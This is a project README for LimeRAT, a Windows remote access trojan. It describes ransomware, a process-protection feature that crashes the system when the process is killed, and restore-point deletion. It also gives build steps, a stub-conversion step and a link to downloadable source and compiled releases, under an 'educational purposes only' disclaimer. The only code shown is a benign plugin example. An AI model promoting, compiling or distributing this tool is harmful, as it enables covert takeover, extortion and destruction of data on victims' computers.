Home

Awesome

Outdated. Archive it instead of delete it


<img src="https://i.imgur.com/Iq5MkAf.gif">

LimeRAT v0.1.9

Remote Administration Tool For Windows


Description

Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves.


Main Features


Prerequisites

To open project you need:

  1. Visual Studio 2017
  2. This repository

Peek

Project

<img src="https://i.imgur.com/lkzM788.gif">

Ransomware

<img src="https://i.imgur.com/aZjpXFe.gif">

Critical Process

<img src="https://i.imgur.com/ULqF7n5.gif">

Plugin Example

VB.NET

'Easy to create a DLL plugin
Public Class Main
'Simple Msgbox
 Public Shared Sub CN(ByVal H As String, ByVal P As Integer, ByVal K As String, ByVal SP As String, ByVal PW As String, ByVal FP As String, ByVal HW As String, ByVal BT As String, ByVal PB As String)

  Msgbox("Hello Client!")

  Send("MSG" + SPL + "Hello Server!")
  'Client will send msg back to server, MSG will be showen in [LOG] Tab
	
 End Sub	
End Class

C#

public class Main
{
    // Simple Msgbox
    public static void CN(string H, int P, string K, string SP, string PW, string FP, string HW, string BT, string PB)
    {
        Msgbox("Hello Client!");

        Send("MSG" + SPL + "Hello Server!");
		// Client will send msg back to server, MSG will be showen in [LOG] Tab
    }
}

Testing

  1. Open "LimeRAT.sln"
  2. Set Compiler to "Debug" mode
  3. On Solution Explorer, Right click on "Solution LimeRAT Project" and press "Rebuild Solution"
  4. Press Run button. be aware that both client and server are localhost

Compiling

  1. Open "LimeRAT.sln"
  2. Set Compiler to "Release" mode
  3. On Solution Explorer, Right click on "Solution LimeRAT Project" and press "Rebuild Solution"
  4. Everything will be under "\Project_EXE\Release"
  5. Convert stub.exe to stub.il, using Ildasm

Download SRC and compiled version

https://github.com/NYAN-x-CAT/Lime-RAT/releases

This project was only tested on local-lab[LAN]. I did not test it on external-lab[WAN].
Server tested on Windows 10, Client tested on virtual machine windows 7.

Notes

  1. While using ransomware, restore point won't be deleted unless payload is running hight privilege
  2. Anti-Kill (BSOD) won't work unless payload is running hight privilege

Found a bug? Please, report it here https://github.com/NYAN-x-CAT/Lime-RAT/issues/new


Author


Donation

Buy me a coffee!


Support


Disclaimer

I, the creator, am not responsible for any actions, and or damages, caused by this software.

You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only.

This software's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use.

By using this software, you automatically agree to the above.


License

License

This project is licensed under the MIT License - see the LICENSE file for details